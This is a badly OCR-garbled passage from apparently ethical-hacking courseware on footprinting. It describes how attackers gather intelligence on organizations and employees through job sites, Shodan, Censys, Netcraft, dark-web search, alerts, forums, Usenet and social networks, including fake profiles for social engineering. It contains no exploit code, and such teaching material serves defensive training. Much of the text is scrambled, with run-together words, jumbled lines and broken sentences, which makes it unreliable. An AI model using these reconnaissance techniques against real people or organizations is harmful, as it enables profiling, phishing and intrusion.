ing
emails
extracted
the bytheHarvester
 InformationfromFinancialServices
Gathering

lad &
Informationfrom FinancialServices
Gathering
Attackerswhoseekaccess to personal
informationor financialinformationoftentargetfinancial
datasuchas stockquotes
andcharts, news, andportfolios.
financial Financial
services suchas
Google
Useful
Finance, MSNMoney,
information
details,
stockexchange
YahooFinance,

rates,corporate
andInvesting.com
suchas the marketvalueof a company’s
pressreleases,
shares, a
can providelarge
companyprofile,
financialreportsalong
amount of
competitor
with news,and
blogsearcharticlesaboutcorporations.Theinformationprovided varies fromone service to the
other.Financialfirmsrelyon webservices
accounts. Attackerscan
malware,exploiting
to perform
transactions
users
obtainsensitive and privateinformation
flaws,breaking
software design
access
andgrant
regarding by
authenticationmechanisms,
to their
thesefirms
service
using

flooding,
andperforming bruteforceattacksandphishing
attacks.
Google Finance
Source:https://www.google.com/finance
The Google finance service featuresbusinessand enterprise headlinesfor many
corporations,
including
their
financial
is alsoavailable,
corporate
decisionsandmajornews events. Stockinformation
as are stockpricechartsthat contain marksfor majornews events and
actions.Thesite alsoaggregates Google news andGoogle blogsearcharticles
abouteachcorporation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Google
225;Screenshot
Figure Service
Finance

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Footprinting JobSites
through
‘company
det
can
be
atere
ob
infastructue ram postings

1GAltackersuse the technicalinformation

‘obtained
through ob ses, such as Dice,
LUnketn andSimpyHired t o detect.
he
lundertingvalnerbiitis target
in
Infrastructure

Footprinting JobSites
through
can gather
‘Attackers valuableinformationabout the operating
system,softwareversions,
company’s
infrastructuredetails,anddatabase schema of an organizationthrough footprinting
jobsitesusingdifferenttechniques. Manyorganizations’
websitesprovide recruiting information
on a jobpostingpagethat,i n turn,reveals
hardwareandsoftware information, network-related
Information,andtechnologies usedbythe company(e.g,, firewall,internalserver type,OSused,
network
appliances,
on.).
addition,
addresses.
organization
website
employee
email
andso In the mayhavea key
advertisesa NetworkAdministratorjob,i t poststhe requirements
list with
Suchinformationmayprove to be beneficialfor an attacker.For example, if an
relatedto that
position,
Further,
attackersc an go through employee resumesposted on jobsitesandextract information
suchasa n individual'sexpertise,
employee
educationalqualifications, andjobhistory.
can revealtechnicalinformationaboutthe targetorganization.
technicalinformationobtainedthrough jobsites suchas Dice,Linkedin,
The history
job of an
Attackerscan use the
and Simply Hired to
detectunderlying vulnerabilitiesi n the targetITinfrastructure.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Ente
pplestins
Sever
T5/et nth yarn
Epne Cle Enger a

valuable
information
2.26;Screenshotof jbpostingshowing
Figure

Module
Page
2 140
tical
Making
and by Countermensores Comet
Copyright©
 Deepand Dark Web Footprinting
Deepw ed

andDarkWebFootprinting
Deep
andcontentusing of Search
regular user
Thesurfaceweb is the outer layer theonlinecyberspace
engines
usethat
are
webbrowsers.
toaccessanddownloadwebpages.Thesurface
thatallowsthe to findweb pages
crawlers programmed
webcan beaccessed
bots
bybrowserssuchas Google
Chrome, MozillaFirefox,andOpera.
Thedeep webis thelayer oftheonlinecyberspace thatconsistsofwebpagesandcontent that
are hiddenandunindexed. Suchcontent cannot belocatedusing traditionalwebbrowsersand
search engines.Thesize of the deepwebis incalculable,
and it expands to almostthe entire
WorldWideWeb.Thedeep webdoesnot allowthe crawlingprocessof basicsearchengines. It
consistsof officialgovernment or federaldatabases andotherinformation linkedto various
The deep
organizations. web can beaccessed using searchenginessuchas TorBrowserandthe
WWWVirtual Library. It can be used for bothlegal
andillegalactivities.
Thedarkwebor Darknetis a deeper layeroftheonlinecyberspace,andit is thesubsetofthe
deep
web
that
enables
anyone
anonymously
without
onlythrough
beaccessed
webto perform
being
traced.
to navigate
specialized
footprinting
toolsor darknet
browsers.
on the targetorganization
Attackers
Thedarkwebcan
primarily usethedark
andlaunchattacks.Thedarkwebcan be
accessed
usingsearch
enginessuchasTorBrowserandExoneraTor.
Attackers
can use deep and dark websearching toolssuchas Tor Browser, ExoneraTor,
and
OnionLand
details,
Searchengine to gather
information,
passports
andSocialSecurity
Numbers(SSNs).
confidential credit
identification
informationaboutthe target,suchas
medical
carddetails, records,
Withthe helpof this information,
card
socialmediaaccounts,
theycan launchfurther
attacks
o n thetargets.

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
TorBrowser
Source:https://www.torproject.org
TorBrowseris usedto access the deep
anddarkweb,
whereit acts as a defaultVPNfor
theuser andbounces through
thenetworkIP address severalservers beforeinteracting
with theweb.Attackersuse thisbrowserto access hiddencontent,unindexedwebsites,
andencrypteddatabases present in the deepweb.
shownin the screenshot,
‘As
hiddeninformationaboutthe target
attackers
byusingTorBrowser,
organization.
can obtain
more
detailed and

Microsoft

Figure2.27:
Screenshot
of TorBrowser

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the Operating
Determining System

the Operating
Determining System
Attackersuse various onlinetoolssuchas Netcraft, Shodan,andCensys to detectthe operating
system usedat the targetorganization. Thesetoolssearch theInternetfordetecting connected
as servers, to
devicessuch routers,
the andloTdevicesbelonging target
tools,attackersobtain information
operating
Using
organization. these
suchas the city,country,latitude/longitude,
system,and IP addressof the targetorganization.
hostname,
Suchinformationfurther helps
attackersi n identifyingpotentialvulnerabilitiesandfinding
effectiveexploits
to performvarious
attackson the target.
Netcraft
Source:https://www.netcraft.com
Thetechniqueof obtaining
information
about the targetnetworkoperating systemis
calledOSfingerprinting.
Open https://www.netcraft.com
in the browserand typethe

the ofidentify
domainname the target
Netcraft
tool
operating
to
system
networki n the What'sthat site running?
al thesitesassociated
runningat eachsite. the
with target
field.Attackersuse
domainalong with the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SearchWebbyDomain

=
Search
SHODAN Engine
of
Netcraft
228:Screenshot
Figure showingtarget system
operating

Source:https://www.shodan.io
Shodanis a computersearchengine that searches
the Internet for connecteddevices
(routers, Youcan use Shodan
servers, andloT.). to discoverwhichdevicesare connected

to are
wherethey located,
the Internet, andwho is using
them.
ical andCountermensores
Mackin ©by E-Comel
Copyright
 attackers
It helps
accessible
to keep trackof all the devices on the targetnetworkthat are directly

to
fromthe Internet. It alsoallowsthe attacker find devicesbasedon the city,
country,latitude/longitude,hostname, operating
system,
and
IP
address.
the attacker to searchfor known vulnerabilitiesand exploits
Metasploit, CVE,
OSVD8, andPacketstorm with a single
it
interface.
Further,helps
a cross ExploitOB,

shownin the screenshot,

‘As attackersuse this tool to detectvarious targetdevices
connectedto the Internetalong
withthe operating system used.

Microsoft OfficialHome Page

-

EiMicrosoftOfficialHomePage*
-

gure Screenshotof SHODANSearchEngne

2.29: showing operating
target system

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Censys
Source:https://censys.io
Censys
monitors the infrastructureand discoversunknownassets anywhere
on the
Internet.It provides
a full view of everyserver anddeviceexposed to theInternet
Attackersuse thistool to monitor the targetITinfrastructureto discovervarious devices
connectedto the Internet along with their detailssuchas the operatingsystem used,IP
address,protocols used,andgeographical location,

EXSY
Ccensys
(ns563444.ip-192-99-7.net)
192.99.7.58

gure Screenshot
2.30: of Censs
Search
Engine
showing
targetoperating

ical andCountermensores
Mackin ©by E-Comel
Copyright
 VoIPand
VPN
Footprinting SHODAN
through

VoIPandVPNFootprinting SHODAN
through
Source:https://www.shodan.io
Shodanis a searchenginethat enablesattackersto perform footprinting
at various levels.It is
usedto detect
footprinting
information.
devices
and networks
can deliver various
The following
with vulnerabilities,A searchin Shodan
results,
screenshots
which will helpgather
forVoIPandVPN
VPN- and VolP-related
showsome of the VPNandVoIP footprinting search
resultsobtainedthrough Shodan

Modul
2 147
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Figure2.31:
Screenshot
ofSHODAN
search
engineshowin
VoIP
results

Figure
232:Sreenshat
ofSHODAN
search
VPN showing ruts
engine

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Competitive
Intelligence
Gathering
(©Compete intligence
is
your
gatheringtheproceso f ientyng gxthering
informationabout emptor fm resources, such
‘sing
onalyzng,
S he Internet
and
verifying

TDscoteneneeneenpires

BEces star
and seen

Competitive
Intelligence
Gathering
(Cont'd)
WhenDidthis
Bogin?
H ow
DiaCompany
it Develop? Say What
Are the
Company's
Plans?
ExpertOpinions
‘What
the Company?
‘bout

|G Information
Resource
Sites
Resource
Stes Resource
.
Sites
Information © Information

cm Walstret
Tanscipt T he
tI oor tonyAewneat cme tito otenonmetecom

telex com
Aayironn
cibat ©

Competitive
Intelligence
Gathering
Competitive gathering
intelligence of identifying,
is the process gathering, verifying,
analyzing,
andusinginformationaboutyour competitors fromresources suchas the Internet. Competitive
intelligence
means
understanding
and
learning
as possible. about
other
businesses
competitiv
It is non-interfering
theft carried out via hacking
andsubtlei n nature compared
or industrial
to become as
to directintellectualproperty
espionage.It focuses o n the externalbusiness

ical andCountermensores
Mackin ©by E-Comel
Copyright
 professionals
environment. In this method, information
gather andlegally
ethically insteadof
gathering
it secretly.

Competitive
intelligence
helps
What are
‘=

doing?
in

the competitors
determining:

=
Howcompetitors their products
are positioning andservices?
=
Whatcustomersare sayingaboutcompetitors’
strengths
andweaknesses?
Companies either byemploying
carry out competitiveintelligence peopleto search for
informationor byutilizing
a commercial databaseservice, whichinvolveslower costs. The
informationthatisgathered
can help the managersandexecutivesof a companymakestrategic
decisions.
Intelligence
of Competitive
Sources
Intelligence
Competitive gathering
can beperformed
usinga director indirect
approach,
Direct Approach
Thedirectapproach intelligence
serves as the primarysource for competitive gathering,
Directapproach techniques
include gathering
informationfrom trade shows,social
engineeringof employees
andcustomers,andso on.
IndirectApproach
Through an indirectapproach, is gathered
informationabout competitors using online
resources. Indirect

‘Company
approach
websites
techniques
include:
andemployment ads
Support threadsandreviews
Search andonlinedatabase
engines,Internet,
Socialmediapostings
Pressreleases
andannualreports

Trade conferences,
journals,
Patentandtrademarks
andnewspapers

andretailoutlets
Productcatalogs
Analyst
andregulatory
reports
Customer andvendorinterviews
distributors,
Agents, andsuppliers
Industry-specific
blogs andpublications
Legal
databases,
e.g,,LexisNexis
informationdatabases,
Business .g,, Hoover's

Onlinejobpostings
ical andCountermensores
Mackin ©by E-Comel
Copyright
Competitive IntelligenceWhenDidthisCompany
-

Begin? HowDidit Develop?

Gathering competitor documentsandrecordshelps to improveproductivity and profitability,
whichi n turn stimulatesthe growth of the company.It helpsi n determininganswers to the
following:
=
Whendid it begin?
Through competitive intelligence,
companies can collectthe history of a particular
as
company,such its establishment Sometimes,
is not oftenavailableto others. date. they gather
crucialinformation
that
How did it develop?
Whatare thevarious strategies Development
that the companyuses? intelligence
can
includeadvertisement customer relationship
strategies, andso on,
management,

Whohelps
leadsit?
Thisinformation a companylearnaboutthecompetitor's
decision-makers,
Where i s it located?

Competitive
intelligence
alsoincludesthe locationof the companyand information
relatedto various branches
andtheir operations.
Attackers gathered
can use the information through intelligence
competitive to builda hacking
strategy.
InformationResourceSites
resource sitesthathelp
Information include:
intelligence
to gaincompetitive
=
EDGAR Database
Source:https://wwwsec.gov/edgar
shtml
The ElectronicData Gathering, Analysis,and Retrievalsystem(EDGAR) performs
automatedcollection, validation,indexing,acceptance, andforwarding ofsubmissions by
companies and otherswho are required bylaw to file with the U.S.Securitiesand
Exchange Commission (SEC).
of the securitiesmarketfor the benefitof investors,
accelerating the receipt,acceptance,
corporations,
dissemination, and analysis
and
It primarypurposeis to increasethe efficiencyfairness
andthe economy by
of time-sensitive
corporate informationfiledwiththe agency
D&B
Hoovers
Source:http://wwhoovers.com
D&BHooversleverages
a commercial
database
of 120 millionbusiness
records
and
analytics
to deliver a salesintelligence
solution that enablessalesand marketing
professionals
to focus theright
for their business on
so that they
prospects c an generate growth
immediate

ical andCountermensores
Mackin ©by E-Comel
Copyright
 LexisNexis
Source:https://www.lexisnexis.com
LexisNexisprovides content-enabledworkflow solutions designed specifically
for
professionals
i n the legal,
riskmanagement, corporate, government, law enforcement,
accounting,and academicmarkets.It maintains a n electronicdatabaseof information

to
related
legal
of legal,and
public
enables
customers
records.
news, and business
agenciesseeking data analytics
it

supporting
to accessdocuments

compliance,
andrecords
sources. It is beneficialfor companies and government
customeracquisition,fraud
detection,healthoutcomes, identity solutions,
investigation,receivables
management,
riskdecisioning,andworkflowoptimization.
Business
Wire
Source:https://www.
businesswire.com
Business Wire focuseson press releasedistributionand regulatory disclosure.This
companydistributesfull-textnews releases,photos,andothermultimedia content from
across the globe
various organizations to journalists,
news media,financialmarkets,
investors,
information
website,
databases,
audiences.
has
electronicnetworkthrough
andgeneral
whichit releasesn ews.
It its own patented

Factiva
Source:https://www.dowjones.com
Factivais a global
news database andlicensedcontent provider. It is a business
informationandresearch
tool that getsinformationfromlicensedandfree sourcesand
provides
capabilities
suchas searching,
alerting, andbusiness
dissemination, information
Factivaproducts
management. provide
access to more than 33,000 sources suchas
licensedpublications, blogs,
influentialwebsites, images,andvideos.Its resources are
madeavailablefromnearly
600 continuously
updated in worldwide28languages,
everycountry
newswires.
including more than

Competitive
- attackers
Intelligence Company's
WhatAre the
Informationresource sitesthat help
Plans?
gaina company’s plans
business include:
=
MarketWatch
Source:https://www.marketwatch.com
MarketWatch of marketsfor engaged
tracksthe pulse investors. Thesite is an innovator
in business financeinformation,
news, personal real-timecommentary, and investment
toolsanddata,with journalists
generatingheadlines,
stories,videos, andmarketbriefs.
TheWallStreetTranscript
Source:https://www.twst.com
TheWallStreetTranscript
is awebsiteas well as a paidsubscription-based
publication
that publishes
industry the views of moneymanagers
reports.It expresses and equity

ical andCountermensores
Mackin ©by E-Comel
Copyright
analysts sectors. Thesite also publishes
of differentindustry interviews with CEOs
of
companies.
Alexa
Source:https://www.alexa.com
Alexais a
©
great
tooldeep
analytics users
to dig into the of othercompanies.
byuncovering
Discoverinfluenceroutreachopportunities sites
It allows
that link to
to
their
competitorsusingCompetitor Backlink
Checker.
Benchmark
Competitive competitors
andtracktheircompany’s
Intelligence
Tools.
performance
relativeto their using

Euromonitor
Source:https://www.euromonitor.com
Euromonitorprovides researchcapabilities
strategy for consumer markets.It publishes
reports consumers,and demographics.
on industries, It providesmarketresearchand
surveysfocused
on theorganization's
needs
Experian
Source:https://www.experian.com
provides
Experian
competitors’
insights
into
search,display,
andmetricsto improvemarketing
strategies
marketing affiliate, andsocial
results.It allowstheuser to:
campaign
©

Benchmark
the
effectiveness
driving
of customeracquisition
competitors’
Determine whatis
existing
success
strategies

Use historical futuretrendsand quickly

consumer data to forecast respond
to
changingbehaviors
performance
Measure website’s industry
against or specific
sites
SECInfo
Source:http://www.secinfo.com
SECInfooffersthe U.S.Securitiesand Exchange Commission (SEC)EDGAR database
service on the web,
with many linksaddedto SEC
dacuments.
It allowssearchesbyname,
industry, business, file number,
SICcode,area code,accession number, CIK,topic,ZIP
code, andso on.
TheSearch
Monitor
Source:https://www.thesearchmonitor.com
TheSearchMonitor provides competitive intelligence
to monitor brandandtrademark
use,affiliatecompliance,
search,
agencies,
andcompetitive
socialmedia,mobile,and shopping
searchmarketers,
on paid
advertisers
search,
andaffiliatemarketersto trackad rank,
search,
organic local
enginesworldwide.It helpsinteractive
ad copy, keyword

ical andCountermensores
Mackin ©by E-Comel
Copyright
 reach, monthly
clickrates and CPCs, marketshare,trademark
ad spending, use, and
affiliate activity.
usPTO
Source:https://www.uspto.gov
TheUnited StatesPatent andTrademark Office(USPTO) informationrelatedto
provides
patentandtrademarkregistration. It providesgeneral
informationconcerningpatents
andsearchoptions for patentsandtrademarkdatabases.
CompetitiveIntelligence
-
WhatExpert OpinionsSayAbouttheCompany?
Informationresource sites that helpthe attacker
to obtain expertopinionsaboutthe target
company include:
=
SEMRush
Source:https://www.semrush.com
SEMRush keyword
is a competitive research tool.It can provide a listof Googlekeywords
andAdWordsfor any site,as well as a competitor list i n the organicand paidGoogle
searchresults.It enablesan approach for gainingin-depth knowledge about what
competitors are advertising
andtheir budget allocationto specific Internet marketing
tactics.
AttentionMeter
Source:http://www.attentionmeter.com
AttentionMeteris a tool for comparingwebsites (traffic)byusingAlexa, and
Compete,
Technorati,It givesa snapshot fromAlexa,
of trafficdataaswell as graphs Compete,
and
for
Technorati the specified
Global
ABI/INFORM
websites.

Source:https://www.proquest.com
‘ABI/INFORM
Globalis a business ABI/INFORM
database. Globaloffersthelatestbusiness
andfinancialinformationfor researchers.
WithABI/INFORM
Global,
users can determine
business
conditions,
management
theory, techniques,
andtactics,
strategy
corporate
business
trends,
andthe competitive
management
landscape.
and
practice

Similarweb
Source:httpsi//www.similarweb.com
SimilarWeb aggregates datafrom multiple sources to estimate traffic,
geography,
and
referraldatafor a company’s
websitesandmobileapps.It also provides a panel
through
a browserextension that allowsrefining other data sources byanonymously tracking
browseractivityacross millionsof browsers
worldwide.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Other Techniques
for Footprinting
through
Web Services

PLE?| wetscmpmen
terse te eet mise

stig
one|*
tegetinnnaras rnp inn noha

Information Gathering
UsingGroups,Forums, 28

system
forums,
Groups
a
and blogs

information,andpersonal
information
about tage, suchas publinetwork
sensitiveinformation
provide information,

wth
fake Yahoo
Aatackers
groups,
register
tc. the i n Googegroups,
profiles andty tojoin target

Using
NNTP InformationGathering UsenetNewsgroups

topisa ofor
Usenetnewsgroupis repository
containing a coletion notes messages
on various su
tht are submitedbythe users ever te Internet
-xackcscan search
theUsenetnewsaroups,s uch andEweka,
as Newshostng to findalable information

re
Other Techniques for FootprintingthroughWebServices Ao
‘=
Information Gathering
Using ProfileSites
Business
Finding
usefulinformationfromcorporate websitesis a necessary
stepi n the information
gatheringphase.Thesebusinessprofilesitescontain businessinformation of companies
regionwith their contact information,
locatedin a particular whichcan be viewedby
anyone.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers use businessprofile
sites suchas opencorporates, Crunchbase,and
to gather
corporationwiki informationaboutthe targetorganizations,
important suchas
theiraddresses,
contact
information
location,
database,
‘employee departmentnumbers,
(such phone
email
addresse
names,typeof service provided,
as
andtypeof industry.

ose e

opencorporates
fscx
| omco

Found
728 companies oggo
ao
o-oo

Figure2.3:Screenshot
of opencorporates Search
showing ests ofMlrosoft

‘Monitoring
Targets Alerts
Using
Alertsare content monitoring automated,
services that provide up-to-date information
basedon user preference,
on thewebsiteandprovide
services automatically
via SMS.
usually emailor To receive alerts,
eitheran emailaddress or a phone
a user must register
number.Onlinealert
notifyusers whennew content from news, blogs, anddiscussion
groupsmatches a set ofsearch terms selectedbytheuser. These services provideup-to
date informationabout competitors andthe industry. Alertsare sent via emailor SMS
notifications
Toolssuchas Google Alerts,Twitter Alerts,and GigaAlerts helpattackersto track
mentions of the organization’s
name, membernames,website, or any people
or projects
that are important.Attackerscan gatherupdated informationabout the target
periodically
fromthe alert services anduse it for furtherattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Alerts
Google
Source:https://www.google.com/alerts
Google Alertsautomatically
notifiesusers when new content from news, websites,
blogs,videos, discussion
and/or groupsmatches a set ofsearchterms selected
bythe
user andstoredbythe Google
Alertsservice.

Figure2.34 of Google
Sereenshot Alert

Microsoft
Com

Figure of Google
2.35:Screenshot AlertPreview

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OnlineReputation
Tracking oftheTarget
Online Reputation
Management(ORM)is a process of monitoringdisplayswhen
someone searchesfor your company’s
reputationon the Internet. ORM then takes
searchresultsor reviews. Theprocesshelps
measuresto minimize negative to improve
brandreputation.
Companies oftentrackthe public feedback givento themusingORMtracking toolsand
then take measures to improve their credibilityand retain their customers’
trust. For
positive onlinereputation management, organizationswill often try to be more

over
the This help collect
transparent Internet. transparency
informationaboutthe target organization,
may theattackerto genuine

OnlineReputation TrackingTools
Onlinereputation tracking helpus to discoverwhatpeople
tools are sayingonlineabout
the company's brandi n real time across the web,socialmedia, and news. They helpi n
monitoring,
measuring, one’s
andmanaging online.
reputation
Anattackermayuse ORMtrackingtoolsto:
Tracka company’s
onlinereputation
Collecta company’s
searchengineranking
information
Obtainemailnotifications
whena companyis mentioned
online
Trackconversations
Obtainsocialnews aboutthe targetorganization
Mention
Source:https://mention.com
tracking
Mentionis an onlinereputation tool thathelps theweb,
attackersi n monitoring
socialmedia,forums, and blogsto learn more aboutthe targetbrandand industry. As
thistoolhelps
showni n thescreenshot, attackersi n trackingonlineconversationsasthey
happen, wherevertheyhappen. Using Mention, attackerscan have live,up-to-date
reportsdelivered
to anyemailaddress i n realtime.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 236:Screenshot
Figure of Mention
InformationGathering
Using and Blogs
Forums,
Groups,
Many Internetusersuse blogs, groups,andforums forknowledge sharing For
purposes.
thisreason,attackersoftenfocuson groups,forums, andblogs to findinformationabout
a targetorganizationandits people.
of informationthat employees
discussions,
generally
monitor
Organizations fail to
reveal to other users i n forums,
Attackerssee this as an advantage
theexchange
blogs, and group
andcollectsensitive informationabout
the target,suchas publicnetwork information, systeminformation, and employee
personal information.Attackerscan register with fake profiles i n Googlegroups,Yahoo
‘Broups,
to
join
target
organizations
groups,
andso on. They
can obtainpersonal where
try the employee
andcompany information.Attackerscan alsosearchfor information
they

forums,
blogs
in groups,
FullyDomain
Names
(FQDNs},
and
and
by Qualified IPaddresses,

Employee
informationthat an attackercan gather and blogs
from groups,forums, may
include:
©. Fullname
oftheemployee
Placeof workandresidence
Home telephone,
cellnumber,
or officenumber

andorganizational
Personal emailaddress

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Picturesof the employee
residenceor work location that includeidentifiable
information
Picturesof employee
awardsandrewards or upcominggoals

Google
Groups

str yourone
Fw
‘Al
of discussions
in place
Cheon
a gous mean

discuss power

Figure2.37: of Google
Sereenshat Groups
InformationGathering
Using
NNTPUsenet Newsgroups
Usenetnewsgroup
i s a repository a collection
containing of notes or messages
on various
subjectsand topicsthat are submittedbythe users over the Internet.NetworkNews
TransferProtocol(NNTP) is used to relay
Usenet news articlesfromthe discussions
over
the newsgroup.
the target.
newsgroups.
Usenetnewsgroups
People
Many
seekhelp byposting
professionals
and asking
questions
use the newsgroups
of
can bea usefuls ource valuable informationabout
for a solutionon Usenet
to resolvetheirtechnicalissuesby
postingquestionson Usenet.To obtainsolutionsfor theseissues,s ometimes they post
more detailedinformation aboutthe targetthanneeded.Attackerscan searchUsenet
newsgroupsor mailinglistssuchas Newshosting,Eweka,andSupernews to findvaluable
informationaboutthe operatingsystems, web servers,etc, usedbythe target
software,
organization,

ical andCountermensores
Mackin ©by E-Comel
Copyright
For example, fromthe screenshotgiven below,you can understand that the target
organizationis usinga RedHat Linux6.2 machinethat is running Apacheweb server
1.3.23,Thisinformation helps
attackersi n performing
web server andweb application
attacks.

Figure238:
sample
Screenshot
of
posting
USENET
newsgroup

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Collecting
Information through on Social
Social Engineering
NetworkingSites
(©Astachers
we
engineering
soci ick to ter senate normation websites
rom soc networking

|e aches
rest fake proteanthenee thefae ent to ureemployees
it thee
eveing senate information

atan rote omactit, location

ete
|| Use sures uses tees

— ||
ftyttmaymenten,
Siueptowsandwien

or pees ritoyes
es on ou neat
Vern

Sao
alee

aes
eae events

throughSocial Networking
Footprinting Sites
Whilefootprinting
through
socialnetworking
sites mayseem similarto footprinting
through

revealing
is greater
information,
detail
socialengineering (whichdiscussed
the two methods.In footprinting
in
through
later),
socialengineering,the attackertrickspeople
whereasi n footprinting
through socialnetworking
thereare some differences
into
sites,the attacker
between

gathersinformation
available
o n thosesites.Attackers
can even use social
networking sitesas a

toperform
medium
social
engineering
attacks, networking
This
section
social andhow
engineering of
explains
itcbe
an
the type information one
obtained.
aims
familiarize
locating
informatio
fromsocialmediasitesusingvarious onlineservices
It
can collectfromsocial
to
andresources,
youwith
sites using

Information through
Collecting SocialEngineering
on SocialNetworking
Sites
Socialnetworking sitesare onlineservices,platforms, or othersitesthatallowpeople to connect
and to build interpersonal relations.The use of socialnetworking sites is increasingrapidly.
Examples
of
such sites includeLinkedin,
so on. Eachsocialnetworking
friends, family
Facebook, Instagram, Pinterest,
site hasits own purpose and features.
and so on, while another helps
Twitter,
YouTube, and
One site may connect
u sers to shareprofessional profiles.Social
networking sitesare open to everyone. Attackersmay take advantage of thisfeatureto gather
sensitive information fromuserseitherbybrowsing through users’
public profiles
or bycreating
a fake profile to poseas a genuine user. Onsocialnetworking sites,people may postpersonal
information suchas date of birth,educational information, employment background, spouse's
names,
and
so
upcomingnewson.
Organizations
often
about post
information
potential
partners,
websites,
thecompany.
suchas and

ical andCountermensores
Mackin ©by E-Comel
Copyright
Foran attacker, socialnetworking sitescan bevaluable s ourcesofinformation about thetarget
or
person organization.
Thereare no barriers
networking
The
attacker
forattackers gather
information
can only
that
posted
by
the
to accessthe public
is individuals.
pagesof accounts createdon social
sites. To obtain more informationabout the target,attackersmay create fake
accounts and use socialengineeringtechniques to lure the victim into revealing more
information.Forexample,
account;if thevictim accepts can
send
theattacker
afriendthe a
therequest,
of the targetpersonon that website.
request
thentheattacker
to targetperson from fake
can accesseven the restricted
pages

InformationAvailableon SocialNetworking Sites

Sofar,we havediscussedhow an attackercan collectinformationfromsocialnetworking
sites.
Now, whatinformationan attackerc an getfromsocialnetworking
we will discuss sites.
People
usually
maintain profiles
on socialnetworking
sitesto provide
basicinformationabout
andto help
themselves
personal
address}, friends’ information
information, aboutfamily
A profile
create andmaintain connectionswith others.
informationsuchas a person's name, contact information(cell
members,
phone number, generally
contains
email
interests,and activities.
People usually connect with friends and chat with them. Attackerscan gather sensitive
informationthrough thesechats.Socialnetworkingsitesalsoallowpeople to sharephotos and
videos.If usersfail to set theappropriate
privacysettingsfortheir albums,thenattackersc an see
the pictures
games
andvideossharedbythem. Users mayjoin groupsto play
Viewsandinterests.Attackerscan collectinformationaboutthe victim's
or to sharetheir
interests bytracking his
orhergroupsandcan thenmislead
events to notify the
victimmore
into revealing information. Users maycreate
other usersaboutupcomingoccasions,fromwhichattackerswill come to know
aboutthe user’s
activities.

activities of users on socialnetworking

‘The sitesandthe respective
informationthat an attacker
can collectis summarized in the following
table.

WhatUsersDo WhatAttacker
Gets
Maintainprofile Contactinfo,location,
andrelatedinformation
Connectto friends,
chat info,and relatedinformation
Friendslist,friends’
photos
Share andvideos Identity members,
of family interests,andrelatedinformation
Play
games,join groups Interests
Createevents Activities
Table 25:Activites of
Likeindividuals,
users

alsouse socialnetworking
organizations
sts
onthesodanetworking andtherespective
sitesto connect with people,
promote
information

their products, and gather feedbackabout their productsand services. The activities of an
organization o n socialnetworking sites and the respective
informationthat an attackercan
collectare summarized in the tablebelow,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Organizations
‘What Do WhatAttackerGets
Usersurveys Business
strategies
Promoteproducts profile
Product
Usersupport Socialengineering
Recruitment Platform/technology
information
Background
checkto hire employees Type
of business

‘Table
2.6:of on
the
social
sites
Actes
and
theorganization networking the respactve
information

ical andCountermensores
Mackin ©by E-Comel
Copyright
 GeneralResourcesfor Locating
Informationfrom Social
Media Sites
|G Atacerstracksocial
media
sites using

to dscover
most shared
contentUsing
hashags track
or keywords,
accounts
‘tacks ue thsinformation
to parton
soil
phishing, andother
engineering,

search f indsthemort
engine
Shared
contentor tpl,

GeneralResourcesfor Locating
Informationfrom SocialMedia Sites
Severalonlineservices andresources are availableto
fromone or more socialmediasites.These gather
valuable informationabouta target
services allowattackers
content across socialmediasites byusinghashtags or keywords,
to discovermost shared
track accounts andURLson
mediasites,obtaina target’s
various social emailaddress, etc.Thisinformationhelpsattackers
to performphishing, socialengineering,andather typesof attacks.
Attackersuse tools suchas BuzzSumo, Google Trends,Hashatit,and Ubersuggest to locate
information
=
on socialmedia
BuzzSumo
sites:
Source:https://buzzsumo.com
BuzzSumo's advancedsocialsearchenginefindsthe most sharedcontent for a topic,
author,or domain,It showsthe sharedactivityacross all the majorsocialnetworks
including Facebook,
Twitter, Linkedin,
Google Plus,
andPinterest.
showni n the screenshot,
‘As attackersuse BuzzSumoto trackthe most sharedcontent
relatedto the targetdomainandobtaindetailssuchas socialmediaaccount information,
andemailaddresses.
URLs,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2.39:Sereenshot
Figure
showing
ofBuzzSumo theshared
content

2
Module 166
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 LocationSearchon SocialMediaSites
Conducting

‘atchawe onl tol, sch a Fllowerwenk,

opm
gang deport aes

LocationSearchon SocialMedia Sites

Conducting
Conducting
locationsearchon socialmediasitessuchas Twitter,
Instagram, helps
andFacebook
to detectthe geolocation
attackers furtherhelps
ofthe target.Thisinformation attackersto
perform various socialengineeringand non-technical attacks.Manyonline tools such as
Followerwonk, and Sysomos
Hootsuite, are available
to searchfor bothgeotagged and non
‘geotagged
informationon socialmediasites,Attackerssearchsocialmediasites usingthese
onlinetoolsusingkeywords, usernames,date,time,andso on.
=
Followerwonk
Source:https://followerwonk.com
Followerwonkhelps
you explore
and grow your socialgraph:
Digdeeper
into Twitter
analytics:
Whoare yourfollowers? a re they
Where When do they
located? tweet?
attackersuse Followerwonk
shownin the screenshot,
‘As to trackthe geolocation
ofthe
targetTwitterusers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Toolsfor Footprinting
through
SocialNetworking
Sites

Tools for Footprinting SocialNetworking

through Sites
Attackersuse various toolssuchSherlock,
SocialSearcher, to footprint
and UserRecon social
networking
sites suchas Twitter,Instagram, and Pinterestto gather
Facebook, sensitive
informationaboutthe targetsuchas DOB,
educationalqualification,
employmentstatus,name
of therelatives,
andinformation thatthey
abouttheorganization a re working
for,includingthe
business potential
strategy, clients,
andupcomingprojectplans.
+
Sherlock
Source:https://aithub.com
shownin the screenshot,
‘As attackersuse Sherlock
to search a vast number of social
networkingsites for a targetusername. Thistool helps
the attackerto locatethe target
user o n various socialnetworking with thecomplete
sitesalong URL.

ical andCountermensores
